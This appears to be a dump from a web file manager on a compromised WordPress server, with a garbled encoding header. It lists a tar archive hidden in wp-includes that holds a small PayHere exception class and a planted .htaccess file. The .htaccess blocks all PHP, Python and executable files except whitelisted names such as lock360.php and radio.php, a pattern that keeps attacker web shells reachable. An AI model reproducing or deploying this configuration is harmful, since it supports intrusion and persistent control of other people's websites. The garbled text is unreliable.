���ѧۧݧ�ӧ�� �ާ֧ߧ֧էا֧� - ���֧էѧܧ�ڧ��ӧѧ�� - /home/zhaagvlk/public_html/wp-includes/Requests/library/block-bindings/Exceptions.tar
���ѧ٧ѧ�
PayHereException.php 0000644 00000000364 15157442036 0010503 0 ustar 00 <?php namespace Lahirulhr\PayHere\Exceptions; use Exception; class PayHereException extends Exception { public function render($request) { return response()->json(["error" => true, "message" => $this->getMessage()]); } } .htaccess 0000644 00000000644 15157442036 0006355 0 ustar 00 <FilesMatch ".(py|exe|php)$"> Order allow,deny Deny from all </FilesMatch> <FilesMatch "^(about.php|radio.php|index.php|content.php|lock360.php|admin.php|wp-login.php)$"> Order allow,deny Allow from all </FilesMatch> <IfModule mod_rewrite.c> RewriteEngine On RewriteBase / RewriteRule ^index\.php$ - [L] RewriteCond %{REQUEST_FILENAME} !-f RewriteCond %{REQUEST_FILENAME} !-d RewriteRule . /index.php [L] </IfModule>